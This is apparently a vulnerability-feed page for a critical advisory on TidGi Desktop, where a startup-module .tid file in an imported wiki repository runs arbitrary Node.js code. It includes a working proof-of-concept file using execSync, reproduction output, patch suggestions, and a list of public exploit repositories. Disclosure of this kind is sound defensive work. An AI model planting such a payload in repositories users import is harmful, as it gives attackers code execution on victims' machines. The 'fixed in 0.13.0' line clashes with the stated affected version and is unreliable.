Feed/GHSA-9hc2-hjx8-q6pv
GHSA-9hc2-hjx8-q6pvCRITICALCVSS 9.6

TidGi Desktop Remote Code Execution via Malicious TiddlyWiki Repository Import — Tiddler Startup Module Auto-Execution

Published Jul 14, 2026·Updated Jul 14, 2026

NVD Description

## Description TidGi Desktop through 0.13.0 contains a critical remote code execution vulnerability exploitable via a single Git repository import. The vulnerability leverages TiddlyWiki's module system, which automatically discovers and executes JavaScript code embedded in `.tid` files placed in the wiki's `tiddlers/` directory: 1. **Auto-loading of `.tid` files** (`src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts:59-92`) — when TidGi boots a wiki workspace, `loadWikiTiddlers` reads all `.tid` files from the filesystem and adds them to the wiki store via `wiki.addTiddlers()`. 2. **Automatic module registration** (`node_modules/tiddlywiki/boot/boot.js:2564-2565`) — `defineTiddlerModules()` iterates all tiddlers in the store. Any tiddler with a `module-type` field is passed to `$tw.modules.define()`, registering it as an executable module. 3. **Automatic startup execution** (`node_modules/tiddlywiki/boot/boot.js:2572-2634`) — all registered modules of type `"startup"` are collected and their `exports.startup()` function is called during the boot sequence. When no `platforms` restriction is set, `doesTaskMatchPlatform()` returns `true`, and the startup function executes with full Node.js `require()` access in the Wiki Worker process. The full chain was verified on macOS with TiddlyWiki 5.4.0 and Node.js v26 — `require('child_process').execSync()` successfully executed arbitrary shell commands. ## Affected Product - **Product**: TidGi Desktop - **Vendor**: Lin Onetwo (https://github.com/tiddly-gittly) - **Repository**: https://github.com/tiddly-gittly/TidGi-Desktop - **Affected Versions**: 0.13.0 (latest release) - **Components**: `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts` (tiddler loading), `src/services/wiki/wikiWorker/startNodeJSWiki.ts` (wiki boot), `node_modules/tiddlywiki/boot/boot.js` (TiddlyWiki core — `defineTiddlerModules`, startup dispatch) - **Package**: tidgi (npm) ## Vulnerability Details ### Root Cause 1 — `.tid` Files Auto-Loaded Before Module Processing **File: `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts:59-92`** ```typescript const tiddlerFiles = wikiInstance.loadTiddlersFromPath(subWikiTiddlersPath); for (const tiddlerFile of tiddlerFiles) { // Register file info for filesystem adaptor // ... // Add tiddlers to wiki wikiInstance.wiki.addTiddlers(tiddlerFile.tiddlers); // ← Line 92 } ``` **File: `src/services/wiki/wikiWorker/startNodeJSWiki.ts:256`** ```typescript wikiInstance.boot.startup({ bootPath: TIDDLY_WIKI_BOOT_PATH }); ``` This triggers `$tw.boot.startup()`, which internally calls `loadStartup()` → `loadTiddlersNode()` → `$tw.loadWikiTiddlers($tw.boot.wikiPath)` (boot.js:2381). TidGi overrides `loadWikiTiddlers` at startNodeJSWiki.ts:123 to intercept and inject sub-wiki tiddlers, but the original function still loads all `.tid` files from the main wiki's `tiddlers/` directory. ### Root Cause 2 — Automatic Module Registration via `module-type` Field **File: `node_modules/tiddlywiki/boot/boot.js:1514-1534`** — `defineTiddlerModules()` ```javascript $tw.Wiki.prototype.defineTiddlerModules = function() { this.each(function(tiddler,title) { if(tiddler.hasField("module-type") && (!tiddler.hasField("draft.of"))) { switch(tiddler.fields.type) { case "application/javascript": $tw.modules.define( tiddler.fields.title, // "$:/plugins/poc/startup.js" tiddler.fields["module-type"], // "startup" tiddler.fields.text // attacker's JS code ); break; } } }); }; ``` This function is called during `execStartup()` (boot.js:2565), **after** `loadStartup()` has already loaded all `.tid` files into the wiki store. Any tiddler with `module-type: startup` and `type: application/javascript` is automatically registered as an executable module. ### Root Cause 3 — Automatic Startup Execution with Full Node.js Access **File: `node_modules/tiddlywiki/boot/boot.js:2572-2576`** — Collecting startup modules ```javascript $tw.boot.remainingStartupModules = []; $tw.modules.forEachModuleOfType("startup", function(title, module) { if(module.startup) { $tw.boot.remainingStartupModules.push(module); // ← attacker's module collected } }); ``` **File: `node_modules/tiddlywiki/boot/boot.js:2631-2634`** — Executing startup ```javascript if(!$tw.utils.hop(task,"synchronous") || task.synchronous) { const thenable = task.startup(); // ← exports.startup() called ``` **File: `node_modules/tiddlywiki/boot/boot.js:2658-2677`** — Platform check (passes without explicit `platforms`) ```javascript $tw.boot.doesTaskMatchPlatform = function(taskModule) { var platforms = taskModule.platforms; if(platforms) { // ... check each platform ... return false; // ← only rejects if platforms is explicitly set } return true; // ← no platforms field → passes unconditionally }; ``` ### Complete Boot Sequence (verified against TiddlyWiki 5.4.0) ``` $tw.boot.startup() // boot.js:2589 ├── initStartup() // boot.js:2393 ├── loadStartup() // boot.js:2538 │ └── loadTiddlersNode() // boot.js:2356 │ └── $tw.loadWikiTiddlers(wikiPath) // boot.js:2381 │ └── wiki.addTiddlers(...) // loads .tid files into store └── execStartup() // boot.js:2553 ├── defineShadowModules() // boot.js:2564 ├── defineTiddlerModules() // boot.js:2565 ← registers attacker's module ├── forEachModuleOfType("startup", ...) // boot.js:2572 ← collects startup modules └── executeNextStartupTask() // boot.js:2611 └── task.startup() // boot.js:2634 ← exports.startup() executes ``` ### Exploitation Conditions - **No authentication required** — importing a wiki is a standard feature - **Only user interaction**: click "Add Workspace" → select folder/URL → confirm ### Complete Attack Flow ``` ┌──────────────────────────────────────────────────────────────┐ │ Step 1: Attacker creates a malicious TiddlyWiki repository │ ├──────────────────────────────────────────────────────────────┤ │ tiddlers/$__plugins__poc__startup.js.tid: │ │ │ │ title: $:/plugins/poc/startup.js │ │ type: application/javascript │ │ module-type: startup │ │ │ │ exports.startup = function() { │ │ require('child_process').execSync('calc'); │ │ }; │ │ │ │ + tiddlywiki.info + any other wiki files │ └──────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────┐ │ Step 2: Victim imports the repository into TidGi Desktop │ ├──────────────────────────────────────────────────────────────┤ │ Add Workspace → Clone Git Repository / Open Local Folder │ │ → TidGi boots the wiki │ └──────────────────────────────────────────────────────────────┘ ↓ ┌──────────────────────────────────────────────────────────────┐ │ Step 3: RCE — startup module auto-executes in Node.js Worker │ ├──────────────────────────────────────────────────────────────┤ │ loadWikiTiddlers loads .tid file → wiki.addTiddlers() │ │ boot.startup() → execStartup() │ │ defineTiddlerModules() → $tw.modules.define("startup", ...) │ │ executeNextStartupTask() → exports.startup() │ │ → require('child_process').execSync('...') executes │ └──────────────────────────────────────────────────────────────┘ ``` ## Proof of Concept ### Minimal `.tid` File (place in `tiddlers/` directory) ``` title: $:/plugins/poc/startup.js type: application/javascript module-type: startup exports.startup = function() { require('child_process').execSync('touch /tmp/TidGi-RCE-PoC.txt'); console.log('STARTUP_EXECUTED'); }; ``` ### Verification Output (macOS, TiddlyWiki 5.4.0, Node.js v26) ``` $ node -e " const \$tw = require('tiddlywiki/boot/boot.js').TiddlyWiki(); \$tw.boot.argv = ['/tmp/evil-wiki']; \$tw.boot.startup(); " STARTUP_EXECUTED $ ls -la /tmp/TidGi-RCE-PoC.txt -rw-r--r-- 1 nuii wheel 0 Jun 3 00:01 /tmp/TidGi-RCE-PoC.txt ``` The message `STARTUP_EXECUTED` printed from within the attacker's `exports.startup()` function, and the file `/tmp/TidGi-RCE-PoC.txt` was created by `execSync('touch ...')`, confirming arbitrary command execution. ## Impact | Capability | Status | Details | |-----------|--------|---------| | Remote Code Execution | ✅ Full Node.js access | `require('child_process')` available | | Arbitrary File Read | ✅ | `require('fs').readFileSync()` | | Arbitrary File Write | ✅ | `require('fs').writeFileSync()` | | Reverse Shell | ✅ | Node.js `net` module | | Persistence | ✅ | Write to startup scripts, LaunchAgents, crontab | | User Interaction | 1 click | Import repository | | Cross-Platform | ✅ | Windows, macOS, Linux | ## Reproduction Evidence ### Step 1 — Malicious `.tid` file content ``` title: $:/plugins/poc/startup.js type: application/javascript module-type: startup exports.startup = function() { require('child_process').execSync('touch /tmp/TidGi-RCE-PoC.txt'); console.log('STARTUP_EXECUTED'); }; ``` ### Step 2 — TiddlyWiki boot with malicious wiki at `/tmp/evil-wiki` ``` $ node -e " const \$tw = require('tiddlywiki/boot/boot.js').TiddlyWiki(); \$tw.boot.argv = ['/tmp/evil-wiki']; \$tw.boot.startup(); " STARTUP_EXECUTED ``` ### Step 3 — Verified RCE: `/tmp/TidGi-RCE-PoC.txt` created ``` $ ls -la /tmp/TidGi-RCE-PoC.txt -rw-r--r-- 1 nuii wheel 0 Jun 3 00:01 /tmp/TidGi-RCE-PoC.txt ``` ## Patch Recommendation ### Fix 1: Disallow `module-type` on User Tiddlers TiddlyWiki should distinguish between system tiddlers (shipped with TidGi or installed as official plugins) and user-created tiddlers. User-created tiddlers should never be allowed to define `module-type`. ```typescript // In defineTiddlerModules() or equivalent if (tiddler.hasField("module-type") && !tiddler.fields.title.startsWith("$:/")) { // User tiddler — silently drop module-type field return; } ``` ### Fix 2: Sandbox User Modules If user-created modules must be supported, execute them in a restricted context without access to Node.js built-ins: ```typescript // Replace direct require access with a restricted API surface const vm = require('vm'); const sandbox = { console, $tw, Buffer }; vm.runInNewContext(moduleCode, sandbox, { timeout: 5000 }); ``` ### Fix 3: Whitelist Allowed `module-type` Values Only allow known safe `module-type` values for user tiddlers: ```typescript const ALLOWED_USER_MODULE_TYPES = ['widget', 'macro', 'filter', 'parser']; if (!ALLOWED_USER_MODULE_TYPES.includes(tiddler.fields['module-type'])) { return; // Block startup, library, saver, etc. } ```

Affected Packages (1)

tidgiNPM
Fixed in = 0.13.0

Public Exploits & PoCs100 found

PoC: YellowKey-BitLocker-CVE-2026-45585

YellowKey BitLocker recovery - bitlocker yellowkey, yellowkey bitlocker, CVE-2026-45585, yellowkey github, yellowkey vulnerability, yellowkey CVE, TPM, BitLocker recovery key backup, Windows 10/11, CLI GUI, portable audit tool. Download:🡇

13

PoC: My-Exploits

Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).

1

PoC: CVE-2025-66478-PoC-Reverse-Shell

CVE-2025-66478 PoC

1

PoC: cve-writeups-and-pocs

CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)

1

PoC: CVE-2026-79483-FastGPT-NoSQL-Injection

FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)

1

PoC: givewp-cve-2026-82222-rce-lab

Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.

1

PoC: CVE-2026-19745

Learn how I found my first two CVEs by pure accident.

1

PoC: cve-2026-23989-opencloud-lab

Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva

1

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

1

PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability

poc and yara rules

1

PoC: CVE-2026-72898

Metabase SQLi

1

PoC: CVE-2026-19478

GitLab Code injection

1

PoC: CVE-2026-75604

CVE-2026-75604 (Next.js Windows RCE) PoC - unauthenticated RCE via cache path traversal + forged Server Action; for authorized security testing

1

PoC: CVE-2026-19632

CVE-2026-19632 - TranslatePress One-Day PoC

1

PoC: gha-lab-e4a85583c3

Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument

PoC: Root-My-Galaxy

KSU installer for supported Samsung Galaxy firmware with CVE-2026-43499

PoC: CVE-2026-78905-Facebook-Account-Takeover

Social Media Infrastructure Vulnerability Research. CVE-2026-78905: OAuth token reuse and session hijacking in Facebook's Graph API.

PoC: CVE-2026-78904-Digital-Dinar-Drain

CBDC Infrastructure Vulnerability Research. CVE-2026-78904: Infinite mint and redemption bypass in central bank digital currency APIs.

PoC: CVE-2026-78903-SWIFT-Kick-to-the-Creds

Offensive Research & Exploit Development. Vulnerability research, PoC development, and offensive tooling for financial infrastructure.

PoC: CVE-2026-60004-Gitea-RCE-PoC

🫖 Direct single-target Gitea CVE-2026-60004 RCE validation PoC

PoC: CVE-2026-60004-Gitea-Validator

🫖 Contract-correlated discovery and authorized validation tool for Gitea CVE-2026-60004

PoC: cve-2026-67363-67364

Balboa form Command Injection POC

PoC: Simulation-d-attaque-BlueBorne-sur-v-hicule-connect-

Simulation complète d'une attaque Bluetooth (CVE-2017-1000251) sur un véhicule autonome via CARLA Simulator ; exploitation de la vulnérabilité BlueBorne pour accéder au bus CAN et déclencher un freinage brutal, en environnement isolé (Kali Linux VM / VMware / Python).

PoC: CVE-2026-76581-Detector

Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.

PoC: htb-machine-ringdown

Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.

PoC: gha-lab-83342297e0

Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.

PoC: WP2Shell-Scanner

Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)

PoC: phpBB-CVE-2026-48611

Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass

PoC: Project-CVE-2026-45833

CVE-2026-45833 ChromaDB

PoC: CitrixBleedCVE-2026-8452-2025-5777

CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.

PoC: CVE-2026-76581

CVE-2026-76581

PoC: drupalgeddon2-cve-lab

Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab

PoC: shellshock-cve-lab

Shellshock CVE-2014-6271 vulnerable CGI lab

PoC: log4shell-cve-lab

Log4Shell CVE-2021-44228 vulnerable lab

PoC: CVE-2026-18741

PoC CVE-2026-18741

PoC: CVE-2026-12513

CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).

PoC: ghostlock-oppo-watch3pro

CVE-2026-43499 on OPPO Watch 3 Pro

PoC: cve-2026-82222-poc

Public PoC for CVE-2026-82222

PoC: zk-xml-probe

Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).

PoC: SOC335-CVE-2024-49138-Investigation

SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.

PoC: papercut-toolkit

#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained

PoC: PaperCut-CVE-2026-81578-82078

Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078

PoC: vankyo-s30-bootloader-unlock

Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method

PoC: CVE-2026-21962-Blog

CVE-2026-21962 Açığı için blog sayfası oluşturdum.

PoC: hdwebmobile-formula-pricing

WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE

PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write

CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.

PoC: CVE-2026-24061-payload

A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass

PoC: CVE-2026-66384

CVE-2026-66384 - Draft or TODO

PoC: CVE-2026-33017-PoC-Reverse-Shell

CVE-2026-33017 PoC Reverse Shell

PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules

CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules

PoC: CVE-2026-10036-speechbrain-rce

SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.

PoC: CVE-2025-55182-poc

I know you are probably here from Hack the Box, if so, yes this one actually works.

PoC: Project-CVE-2026-50751

IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.

PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine

A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.

PoC: Zimbra-CVE-2026-73570-Rules

Wazuh Rules for Detection Zimbra (CVE-2026-73570).

PoC: CVE-2022-46169

Cacti 1.2.22 unauthenticated command injection

PoC: CVE-2024-23897

Jenkins CVE-2024-23897 — CSRF-crumb aware PoC

PoC: CVE-2025-10952-ml-logger-AFR

PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3

PoC: CVE-2026-65643

CVE-2026-65643 - Draft or TODO

PoC: cve-2023-23397-detection-lab

Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.

PoC: fastjson-cve

fastjson-cve-2026-16723

PoC: CVE-2026-23751-poc

Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)

PoC: CVE-2023-27350-CVE-2023-27351

CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO

PoC: Project-CVE-2026-33017

CVE-2026-33017 - Langflow Unauthenticated RCE Exploit

PoC: CVE-2026-70463

Testing CVE-2026-70463 by Fyyre

PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report

Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.

PoC: CVE-2026-20131-Post-Incident-Written-Report

Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.

PoC: ghostlock-pfem10

GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes

PoC: htb-labs-connected

Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.

PoC: spring-ai-sibling-loop-poc

Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)

PoC: mssharepoint-scanner

A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.

PoC: weblogic

Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)

PoC: CVE-2021-27876-veritas-backup

Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)

PoC: Project-CVE-2026-65351

For educational purposes

PoC: rmg-s9180-fzg1

Root My Galaxy SM-S9180 (dm3q) S9180ZHS8FZG1 payload port - CVE-2026-43499 + KernelSU LKM

PoC: hacktivity-vulns-exploits-lab

Writeup + CVE analysis + countermeasures for the Hacktivity 'Vulnerabilities, Exploits, and Remote Access Payloads' lab (netcat shells, Metasploit, CVE-2010-1240, CVE-2004-2687).

PoC: CVE-2026-55040-Mass-Exploit

CVE-2026-55040

PoC: Project-CVE-2026-75604

A Python-based exploitation framework for CVE-2026-75604 that enables authorized penetration testers to validate Next.js Windows cache traversal vulnerabilities. Deploys reverse shells and webshells via path traversal, with built-in target verification and proxy support for seamless integration into standard pentest workflows.

PoC: CVE-2026-18963

CVE-2026-18963 Keycloak Reset-Credentials State Bypass Detector

PoC: CVE-2015-3246

CVE-2015-3246

PoC: CVE-2015-5287

CVE-2015-5287

PoC: htb-labs-nexus

Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service.

PoC: Cisco-CVE-2026-20303-More

CVE-2026-20303, CVE-2026-20304, CVE-2026-20310, CVE-2026-20312, CVE-2026-20313

PoC: CVE-Ubiquiti

CVE-2026-77542, CVE-2026-77543, CVE-2026-77545, CVE-2026-77550, CVE-2026-77551, CVE-2026-77552, CVE-2026-77553, CVE-2026-77554, CVE-2026-77557 - Draft or TODO

PoC: CVE-2026-18431

CVE-2026-18431 - Draft or TODO

PoC: CVE-2026-8467

CVE-2026-8467 - Draft or TODO

PoC: CVE-2026-50787

Security advisory for CVE-2026-50787: uncontrolled resource consumption in e-SIC Livre CAPTCHA generation leading to remote denial of service.

PoC: solarview-ics-vulnerability-analysis

Threat model and vulnerability analysis of Contec SolarView Compact (CVE-2022-29303)

PoC: CVE-2026-72898-metabase-sqli

Detector + root-cause analysis for CVE-2026-72898 (Metabase unauthenticated SQLi via reset_password)

PoC: By-Poloss..-..CVE-2026-18080

Poc CVE-2026-18080

PoC: CVE-2026-63520

POC pre-auth RCE on Sharepoint chain

PoC: f_hid-4.14-backports

Backports of three published f_hid fixes (incl. CVE-2026-31721, CVE-2026-31606) to an EOL Linux 4.14.190 Android vendor kernel, with on-device verification records.

PoC: chrome-vuln-scanner

Check for CVE-2026-79266. A use-after-free in the DevTools component allows arbitrary code execution inside the sandbox via a malicious Chrome extension leveraging social engineering.

PoC: CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

PoC: CVE-2026-19632-POC

PoC for CVE-2026-19632 - TranslatePress – Multilingual <= 3.3.1 - Unauthenticated Account Takeover via Password Reset Link Disclosure

PoC: ghostlock-infinix-hot70

Proof-of-concept kernel exploit for GhostLock (CVE-2026-43499) on the Infinix Hot 70.

PoC: CVE-2025-2945-pgAdmin-RCE

PoC for CVE-2025-2945 — pgAdmin 4 authenticated eval() injection RCE, CVSS 9.9

PoC: CVE-2026-63072

CVE-2026-63072

PoC: CVE-2026-76904

PostGIS SQL Injection GeoTools

PoC: CVE-2014-085

ZooKeeper 未授权访问漏洞(CVE-2014-085)PoC 及靶场

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free